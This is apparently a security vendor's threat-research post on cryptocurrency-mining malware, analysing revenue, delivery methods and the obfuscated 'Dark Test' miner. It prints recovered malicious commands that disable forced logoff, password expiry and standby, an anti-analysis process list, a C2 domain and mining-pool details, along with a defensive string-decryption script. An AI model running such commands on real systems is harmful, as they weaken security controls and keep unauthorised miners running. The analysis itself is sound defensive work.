Cryptocurrency and \"blockchain\" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining and adversaries are obviously paying attention. \n \n\n\n## What is 'Mining'?\n\n \nAt a high level mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining let's address the currencies that make sense to mine. \n \nBitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU & GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR) and adversaries have done their research. In addition Monero is extremely privacy conscious and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with heavy emphasis on privacy may become a safe haven for threat actors. \n \nThere are two ways that mining can be performed, either with a stand alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems resulting in a higher hashrate and theoretically the production of increased amounts of currency. 
It's pool-based mining of Monero that we have seen most frequently leveraged by attackers as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise. This is similar to launching Distributed Denial of Service (DDoS) attacks where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic. \n \n\n\n## How does pool based mining work?\n\n \nPool-based mining is coordinated through the use of 'Worker IDs'. These IDs are what tie an individual system to a larger pool and ensures the coin mined by the pool that is associated with a particular Worker ID are delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following: \n\n\n 1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.\n 2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful as it allows for a better understanding of the earning potential for these malicious mining pools.\nThese miners typically operate from the command line and make use of a series of arguments used to establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below: (note that there are variations in the parameter names used based on the specific mining software being used.) 
\n\n\n[](<https://2.bp.blogspot.com/-ZmEzpdA1pzU/WnG17Z6ncAI/AAAAAAAAAkM/v_-jqvA3Tx4v4Ifg6PSTn6xHAxs92brwgCLcBGAs/s1600/image7.png>)\n\n**Example Command Line Syntax**\n\n \nAs you can see there are two primary argument values required: The URL for the mining pool and the 'Worker ID' that is used to tie the mining activity taking place on the system to a specific mining pool which is used to manage how payouts are conducted. However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activities. If the mining software is executed without these options, victims might notice significant performance degradation on their systems as no computing resource limits are enforced. These options include: \n\n\n * Limits on CPU Usage.\n * Limits on System Temperature.\n * Amount of cores being used.\n * Sleep periods.\nEach mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor specifying the arguments to use). \n \n\n\n## Origins on the Underground\n\n \nTalos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016 and the interest has been steadily building since that time. \n \nFrom a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. 
The discussions have been split with the majority of the discussion around the sale of access to mining bots as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied with a learning curve associated with mining, including a better understanding around how much coin can be mined and the opportune times to conduct the mining activity. As far as the malware that can be used to conduct mining, most of them are written in C# or C++ and as is common on these forums they are advertised with low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis. \n \nIn general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them. \n \n\n\n## Malicious Mining\n\n \nMalicious mining is the focus of this post since it's an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities and malicious mining is quickly becoming a cash cow for the bad guys. \n \nOver the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective and with good reason. It is an extremely profitable business model as we've shown through our Angler Exploit Kit [research](<https://www.talosintelligence.com/angler-exposed/>) where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention and with that attention came an increased focus on stopping this type of activity. 
Both operating systems and security vendors got better at stopping ransomware before it affected much of the system. \n \nAdversaries are left with an interesting decision, continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink or begin leveraging other payloads. There are no shortage of options available to bad guys including banking trojans, bots, credential stealers, and click-fraud malware to name a few. \n \nSo why choose crypto mining software? \n \nThere are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands off infection to manage. Once a system has a miner dropped on it and starts mining nothing else is needed from an adversary perspective. There isn't any command and control activity and it generates revenue consistently until its removed. So if an adversary notices a drop off in nodes mining to their pool it's time to infect more systems. Another is that it's largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, hiding under the users purview for as long as possible. The longer the user doesn't notice the miner running the larger potential payout for the activity. \n \nThe biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners attackers can take both of those costs out of the equation altogether. 
Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware and attackers receive all the benefits of the mined coin. \n \nLet's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second. One system alone without any hardware or electricity cost would generate about $0.25 of Monero a day, which doesn't seem like a lot but when you start pooling systems the amount of earning potential increases rapidly. \n \nSome of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue. \n \nIn one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero. \n\n\n[](<https://3.bp.blogspot.com/-MG_1-PGHnRc/WnG2S4DYdCI/AAAAAAAAAkQ/wm5t4BG-cyQT8H5R0SvXpiTP-vQ0i2CKQCLcBGAs/s1600/image21.png>)\n\n**Worker ID Statistics**\n\n \nIn a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). 
In these cases, successful exploitation would often lead to the installation and execution of mining software. \n\n\n[](<https://4.bp.blogspot.com/-M5-8y8Fx7Yo/WnG2YgVvaQI/AAAAAAAAAkU/ZVgb1EDHpsERm40rt653hTMYUH1Qvh51ACLcBGAs/s1600/image31.png>)\n\n**Historical Hash Rate**\n\n \nIn analyzing the size and scope of this campaign, we observed that shortly after these attacks began the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s. \n\n\n[](<https://3.bp.blogspot.com/-pjStDnu5oE8/WnG2d2dGbvI/AAAAAAAAAkY/Rxy4y24ajzQfDgPsl0EfQA9VeuZ5BDQegCLcBGAs/s1600/image11.png>)\n\n**Current Hash Rate**\n\n \nWe used an online calculator that takes hash rate, power consumption and cost and then estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers. \n \nAnalyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884. \n\n\n[](<https://2.bp.blogspot.com/-cBKLUb4FJsY/WnG2jRgOLaI/AAAAAAAAAkc/vkIhD0cKfXUcw-bRIzTnENRE5fY7kDHTACLcBGAs/s1600/image5.png>)\n\n**Worker ID Payment History**\n\n \nWhile analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach. 
\n\n\n[](<https://3.bp.blogspot.com/-iFc7bTVYL4I/WnG3Ofd1fiI/AAAAAAAAAkw/OW1LuQqLbnYWaFFq3VVfkq-rxkwbhPc4ACLcBGAs/s1600/table.png>)\n\n**High Volume Calculations**\n\n \nOne additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year from $13 in January 2017 to over $300 at the time of this article and at times has approached $500. As long as the cryptocurrency craze continues and the value continues to increase, every piece of cryptocurrency mined increases in value which in turn increases the amount of revenue generated. That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting onto systems in the first place? \n \n\n\n## Threats Delivering Miners\n\n \nCryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and directly via exploitation. \n\n\n### Email Based\n\n \nThere are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. The way these infections typically work is that a user is sent an email with an attachment. These attachments typically have an archive containing a Word document that downloads the miner via a malicious macro or unpacks a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the binary that is included is a widely distributed Monero miner which is executed with the miscreant's worker ID and pool, allowing attackers to reap the mining benefits. \n \nBelow is an example, from late 2017, of one of these campaigns. It's a job application spoof that includes a Word document purporting to be a resume of a potential candidate. 
\n\n\n[](<https://3.bp.blogspot.com/-HN1jDjRs9NA/WnG3ofsv07I/AAAAAAAAAk0/4X5qS3uMf18a-Kp7PAKUc-glbFynIHzSQCLcBGAs/s1600/image24.png>)\n\n**Example Malicious Email**\n\n \nAs you can see the email contains a word document which, when opened, looks like the following. \n\n\n[](<https://2.bp.blogspot.com/-YCNN3stnTLI/WnG3utpzHHI/AAAAAAAAAk4/cCbjw9yYuCgHf0Q5TZgqKlXA6OBCPxb_ACLcBGAs/s1600/image4.png>)\n\n**Example Word Document**\n\n \nAs is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used. \n \nThis image entices the user to enable macro content within the document that is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros using the Document_Open function: \n\n\n[](<https://4.bp.blogspot.com/-dyl8BOtHiUE/WnG303uF5iI/AAAAAAAAAk8/B-VcgP43bnU3nMYcTAfcxrp_IwAxif2ewCLcBGAs/s1600/image22.png>)\n\n**Highly Obfuscated VBA Macros Using Document_Open()**\n\n \n\n\nThe macro leads to a call to a Shell command: \n\n\n[](<https://1.bp.blogspot.com/-XOkkw3a6yUE/WnG4AVkCURI/AAAAAAAAAlA/VrDifm1A5oovDdn32WTa6HO76vUcmQJtQCLcBGAs/s1600/image32.png>)\n\n**Highly Obfuscated VBA Macro VBA.Shell Call**\n\n \nWe can see what is executed by this command after it is de-obfuscated by setting the first parameter into a MsgBox call: \n\n\n[](<https://2.bp.blogspot.com/--COaPZAv6Ew/WnG4LxL9dfI/AAAAAAAAAlE/GYytdgVpwOsm3yOL6Zh-z_UQAvlPFI6AQCLcBGAs/s1600/image30.png>)\n\n**MsgBox for Shell Replacement**\n\n \nThis will retrieve an executable remotely using System.Net.WebClient and execute it using Start-Process. 
This can also be seen through the dynamic activity in Threat Grid: \n\n\n[](<https://2.bp.blogspot.com/-mmTPAo0x4MQ/WnG4WK_-dTI/AAAAAAAAAlQ/J_DdWb9W-BsYAda0piFe3P56gM_gGVrTQCLcBGAs/s1600/image10.png>)\n\n**Office Document Launches a Powershell Indicator in Threat Grid**\n\n \nWe also identify that the downloaded binary is attempting to masquerade itself through its use of an image extension: \n\n\n[](<https://2.bp.blogspot.com/-YzD2ro54GK0/WnG5aJkJG5I/AAAAAAAAAlg/0ehj3iBDLigETrSyPdQvkcM7NJB5qr7OwCLcBGAs/s1600/image19.png>)\n\n**Portable Executable Image Extension Identification Threat Grid**\n\n \nIn this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner. This activity can be seen dynamically within Threat Grid: \n\n\n[](<https://3.bp.blogspot.com/-oAAn84JRp6M/WnG5k-T3a2I/AAAAAAAAAlk/RrVDgGKgj90yTIzm_Bap_fG6o9T89qdgwCLcBGAs/s1600/image20.png>)\n\n**xmrig Execution in Threat Grid**\n\n \nDynamic miner activity can also be observed within the AMP for Endpoints product line. An example below can be seen within the portal's Device Trajectory: \n\n\n[](<https://1.bp.blogspot.com/-AniIUgZrSrA/WnG5ui4mMwI/AAAAAAAAAlo/SgG7inliyH8OQPc9WLo_oug-1ct2g04dwCLcBGAs/s1600/image13.png>)\n\n**Dynamic Miner Execution in AMP for Endpoint's Device Trajectory**\n\n \nMining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments: \n\n\n[](<https://4.bp.blogspot.com/-TJimRD6275k/WnG53Hz4rCI/AAAAAAAAAls/8Ahjkqr-spA-ffuY1RQ0SWRpZ2dkQnDegCLcBGAs/s1600/image12.png>)\n\n**Mining Traffic Classification using Cognitive Threat Analytics**\n\n \n\n\n### Dark Test Cryptomining Malware\n\n \nDark Test (the name taken from the decompiled source code) is an example of Cryptomining malware written in C# that drops a UPX packed variant of the xmrig XMR CPU miner. 
Being written in C#, the binary contains .NET IL (Intermediate Language) which can be decompiled back into source code. The C# code is highly obfuscated containing an encrypted resource section for all referenced strings, and functions that are resolved at runtime. The following section will discuss these techniques in detail. \n \n\n\n### Dark Test Obfuscation\n\n \nDark Test makes use of a packer which, after unpacking, creates a suspended version of itself using CreateProcessA and overwrites itself in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping from the address of lpBuffer buffer up to nSize. \n \nDark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations resulting in the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer: \n\n\n[](<https://2.bp.blogspot.com/-FW3xpQMFWTQ/WnG5_oHjZ7I/AAAAAAAAAlw/BiZn3XD0hlwNOu4QsRcNJPWt6FsOLshjwCLcBGAs/s1600/image29.png>)\n\n**Dynamic Method Resolution Using metadataToken Integer**\n\n \nFunctions are also indirectly called using the calli function which is passed a pointer to an entry point of a function and its accompanying parameters: \n\n\n[](<https://4.bp.blogspot.com/-BxKE4FUS_xo/WnG6HeOmbpI/AAAAAAAAAl0/iH44lM8q1Wo8CMZE61rxRgNrfLeUs_IeQCLcBGAs/s1600/image6.png>)\n\n**Runtime Resolved Function Calls using calli**\n\n \nThe decryption function takes three integer parameters. 
The first two make up the seek offset for the length and offset of the string to be decrypted, and the third is the XOR key for the string at this offset: \n\n\n[](<https://2.bp.blogspot.com/-5fAlSxHtsCs/WnG6PTD63ZI/AAAAAAAAAl8/WSBazviqxpMRnVke6nqudB0XZFWbrfDGgCLcBGAs/s1600/image27.png>)\n\n**Dark Test String Decryption Function**\n\n \nAt the calculated offset, the first four bytes is the offset of the ciphertext, and the next four is length of the string being decrypted. It then iterates for this length within an XOR for loop to decrypt the string at this offset. These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects: \n\n\n[](<https://3.bp.blogspot.com/-QHHC8NNpqhs/WnG6WuFY_3I/AAAAAAAAAmE/vyUgwV2z5egBm1veQbHpnJzX2_YsHa4agCLcBGAs/s1600/image17.png>)\n\n**Dark Test String Decryption Function Call**\n\n \nThe result, in this case, being the string \"-o pool.minexmr.com:4444 -u\" which is the domain and port combination for the mining pool the miner is participating in and the username parameter without a value. Although these strings are decrypted at runtime they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use): \n\n\n[](<https://3.bp.blogspot.com/-Bnn3A7ixXqo/WnG6dckoDWI/AAAAAAAAAmI/TmyF9F_Qr5Ms7ycfr9SXEoE4p9N68VaCgCLcBGAs/s1600/image2.png>)\n\n**Dynamic Miner Activity Command Line Arguments**\n\n \n\n\nRuntime resolved objects and functions make it difficult to extract all strings as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis due to different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal): [106, 242, 28] for each length. The result is that we can search for these bytes (being the first three of the length calculation) to find runtime calculated offsets. 
Once we know the length we can glean the ciphertext offset from the previous four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking for resulting valid ASCII ranges: \n\n \n \n #!/usr/bin/ruby \n \n fr = File.read(ARGV[0]) \n fb = fr.bytes \n \n for i in 0..fb.length-4 \n #Through their obfuscation technique we get an egg for obfuscated string lengths and offsets to find in the resource \n if fb[i] == 106 && fb[i+1] == 242 && fb[i+2] == 28 \n #Perform their arithmetic with provided bytes into an 32-bit int \n length = [fb[i-1], 106, 242, 28].pack(\"V*\").split(\"\\x00\").join.unpack(\"V\")[0] - 5 ^ 485648943 \n seek_offset_bytes = [fb[i-5], fb[i-4], fb[i-3], fb[i-2]] \n seek_offset = (seek_offset_bytes.pack(\"V*\").split(\"\\x00\").join.unpack(\"V\")[0] ^ 2100157544) - 100 \n puts \"Found length of: #{length}\" \n puts \"Seek offset bytes: #{seek_offset_bytes.inspect}\" \n ciphertext = [] \n for j in 0..length-1 \n ciphertext << fb[seek_offset+j] \n end \n if length > 2 \n for x in 0x00..0xFF \n finished = true \n result = [] \n for c in ciphertext \n unless((x ^ c).between?(0x20,0x7E)) \n finished = false \n break \n end \n result << (x ^ c) \n end \n if finished \n puts \"Found possible XOR key for string: #{result.pack(\"I*\").split(\"\\x00\").join} of length: #{length}\" \n end \n end \n end \n end \n end \n \n \n\nThis brute force approach provides some invalid results, however, also provides clear-text strings after manual review, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online to continue mining: \n\n \n \n /C net accounts /forcelogoff:no\n\nThis prevents forced logoffs from remote administrators. \n\n \n \n /C net accounts /maxpwage:unlimited\n\nThis sets the maximum password age to unlimited, which in turn prevents password expiry. 
\n\n \n \n /C powercfg /x /standby-timeout-ac 0\n\nThis will prevent the computer from entering standby mode, thus continuing mining operations when the computer is idle. \n\n \n \n /C reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f of length: 99\n\nThis will prevent the screensaver from starting. \n \nFurther, observed strings are those for anti-analysis: \n\n \n \n procexp \n PROCEXP \n pROCESShACKER \n ProcessHacker \n procexp64 \n Detect detector! \n Clear! \n taskmgr\n\n### Dark Test Network traffic\n\n \nTwo GET requests are sent to the api.ipfy.org used for public IP address identification. This is then followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URL locations of two executable files: bz.exe and cpu.zip \n\n\n[](<https://3.bp.blogspot.com/-Qc4_UEtvGbQ/WnG6t_zCEDI/AAAAAAAAAmU/Tbbi2yeKVKkhvIOmytvbMe3huDcz2cZJwCLcBGAs/s1600/image18.png>)\n\n**Dynamic Miner Activity Command Line Arguments**\n\n \nOddly enough this is not a valid .onion address, and is likely a placeholder from the server for this dropper, or a kiddie who set this up without replacing what the gateway was returning to the dropper on request. When searching for this pattern we came across a valid pastebin address containing a number of SQL commands for setting up a database with these domains with Russian comments: \n\n\n[](<https://1.bp.blogspot.com/-8Tjmvd6M01E/WnG61VY3rZI/AAAAAAAAAmc/jUfzdPmMu38oApQ9rKvbqIutNJdpdgttQCLcBGAs/s1600/image33.png>)\n\n**Pastebin SQL Commands**\n\n \nThis further implies the possibility of a builder or distributed gateway being used. 
Further searches turned up a number of in-the-wild filenames which correspond to wares: \n\n\n[](<https://3.bp.blogspot.com/-lPM4zO7Yy-I/WnG6-j_QqsI/AAAAAAAAAmg/eb6YMKLP9m02kqcHC39H5BowbycRyZLmgCLcBGAs/s1600/image15.png>)\n\n**Dark Test VirusTotal Observed in-the-wild Filenames**\n\n \nThis could indicate warez as being a possible distribution vector for this malware. \n \n\n\n### Dark Test Version 2\n\n \nThroughout the month of November, we started observing a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary but contained a statically linked version instead. Due to shared attributes with the first version of Dark Test we believe this is a new iteration written in Visual C++ rather than C#. The binary is shipped within an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and resumes the main thread. A notable difference is a more extensive list of anti-analysis strings which are searched for using Process32FirstW: \n\n\n[](<https://3.bp.blogspot.com/-yMVA8UyzTPM/WnG7LBRPlAI/AAAAAAAAAmk/F1xZeoz6HuQ9IfwbpwapLaZ_XfFKSbucgCLcBGAs/s1600/image14.png>)\n\n**Anti-Analysis Strings**\n\n \nAn interesting addition being vnc.exe to possibly detect VPS or analysis systems connected to using VNC. \n \n\n\n### Exploit Kit Based\n\n \nIn addition to the spam campaigns above Talos has also been observing RIG exploit kit delivering miners via smokeloader over the last couple months. The actual infection via the exploit kit is pretty standard for RIG activity. 
However, the great thing about mining is there are easily trackable elements left on the system, namely the 'Worker ID', as shown below: \n\n\n[](<https://4.bp.blogspot.com/-cRla5BFyQAo/WnG81bNNsbI/AAAAAAAAAm4/76tiUp0EMDIoF_TkhbSJyUWBXH02-upbACLcBGAs/s1600/image23.png>)\n\n**Command Line Syntax**\n\n \nUsing the Worker ID of: \n\n \n \n 43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD\n\nwe began digging into the amount of hashes this system is mining. What we found was a worker that was fluctuating between 25 KH/s and 60 KH/s. Taking the average at 42.5 KH/s, this actor was earning about $85/Day. \n \nThat may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years without being impacted without additional maintenance required by the actor. The only operational costs are associated with renting the exploit kit and associated infrastructure. Once victims are compromised, the activity continues for a cool $31,000 annually. \n \nHowever, when we started looking further back, this campaign has been ongoing off and on over the last six months with peak hash rates in excess of 100 KH/sec. \n\n\n[](<https://4.bp.blogspot.com/-S2jqc1PAgvQ/WnG9HDPM8zI/AAAAAAAAAm8/9BTHhW1hh2wYgMTCDMX4KXsFvaWSuElKQCLcBGAs/s1600/image16.png>)\n\n**Historical Hash Rate**\n\n \nThe campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid December. It's currently still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader. 
\n \n\n\n### Active Exploitation\n\n \nIn addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits, and most recently an Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and finally can result in significant financial gain. \n \nWhen you take threats being delivered to users via email and web as well as internet connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little bit deeper on the actual mining activity and the systems that have already been mining. \n \n\n\n## Deeper Dive on Mining and Workers\n\n \nOver the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain. \n \nOne thing that has been common with most of the malicious miners we found was the choice of filenames. Threat actors have chosen filenames that look harmless, such as \"Windows 7.exe\" and \"Windows 10.exe\". Additionally, Talos commonly saw \"taskmgrss.exe\", \"AdobeUpdater64.exe\", and \"svchost.exe\". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below. 
\n\n\n[](<https://3.bp.blogspot.com/-4AgsOM4lq_Y/WnG9YRuQ6vI/AAAAAAAAAnA/0uu00Q-7QMQueR7KPdE5qKzbn_p0K3p9gCLcBGAs/s1600/image28.png>)\n\n**Command Line Syntax**\n\n \nInterestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product [Immunet](<http://www.immunet.com/index>). \n \n\n\n## Mining as a Payload for the Future\n\n \nCryptocurrency miner payloads could be among some of the easiest money makers available for attackers. This is not to try and encourage the attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue for attackers. Attackers simply have to infect as many systems as possible, execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will likely be just as happy computing 10KH/s as 500KH/s. If they have a specific hashrate goal, they can simply continue distributing miners to victims until they reach that goal. \n \nThe sheer volume of infected machines is how attackers can measure success with these campaigns. Since financial gain via mining is the mission objective there is no need to attempt to compromise hosts to steal documents, passwords, wallets, private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide secondary financial benefit or, in some cases, deliver the real malicious payload. In the latter case ransomware can be used as a smokescreen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more. 
\n \nSimply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However consider 100,000 systems and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software they already have their method of gains in the form of the control of system resources and the volume of hashes that can be generated by it. \n \nRecurring revenue is not just something a legitimate business strives for. Malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks and rarely is this type of malware used to attack 100,000s of users. As such a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers attackers have created an entire solution specifically designed to do one thing: generate recurring revenue. \n \nContinuing use of cryptominers as a payload and ensuring the system is running at full capacity will continue to evolve. Talos has observed attacks where the attacker has cleaned up the machine by removing other miners before then infecting the user and installing their own mining software. Attackers are already fighting for these resources as the potential monetary value and ongoing revenue stream is massive. \n \n\n\n## Are Miners Malware?\n\n \nMining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines. 
Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, perform and validate transactions and reward miners performing the complex mathematical calculations to ensure the integrity and security of the cryptocurrency ecosystem & network. \n \nIf a legitimate user runs the mining software locally they can run their own mining platform; likewise a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that they are performing this task intentionally. The malicious actor is performing this task, in the exact same manner as the legitimate user, but without the user's knowledge or consent. The difference is the deception that occurs for the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the malicious arsenal the attacker chooses to use, but, much like when Powershell or PSExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that is important. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and are having their computational resources abused to generate revenue for the actors. \n \n\n\n## Enterprise Impacts\n\n \nRegardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments. \n \nThis is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, it is wasted or stolen resources for an organization and depending on the configuration of these systems, it could have larger impacts. 
Obviously if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin. \n \nDue to the large amount of willing users, it might warrant an organization crafting a policy or adding a section to existing policy regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these file should be treated as malware, and removed/quarantined as such. \n \n\n\n## Fails we Found\n\n \nWhile investigating malware campaigns that were distributing Monero mining software we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below: \n\n\n[](<https://4.bp.blogspot.com/-gYfSx4Z3fR4/WnG9hB4ZaOI/AAAAAAAAAnE/EK10eb8tztI0t8vU5UKISuX3zSzLIVjPgCLcBGAs/s1600/image9.png>)\n\n**Command Line Syntax**\n\n \nInterestingly, the userpass parameter that is used to register the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software source code as released on GitHub. The attacker didn't bother to change it, resulting in all of the machines infected mining Monero which was being sent to the mining application's author - not the attacker themselves. \n\n\n[](<https://4.bp.blogspot.com/-Serv6ugXd5s/WnG9qlxt1GI/AAAAAAAAAnI/BQeRNxdbKKkQ3aOYZ2aZrGQFwAa74aOOgCLcBGAs/s1600/image34.png>)\n\n**Source Code Default Values**\n\n \nIn several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners. 
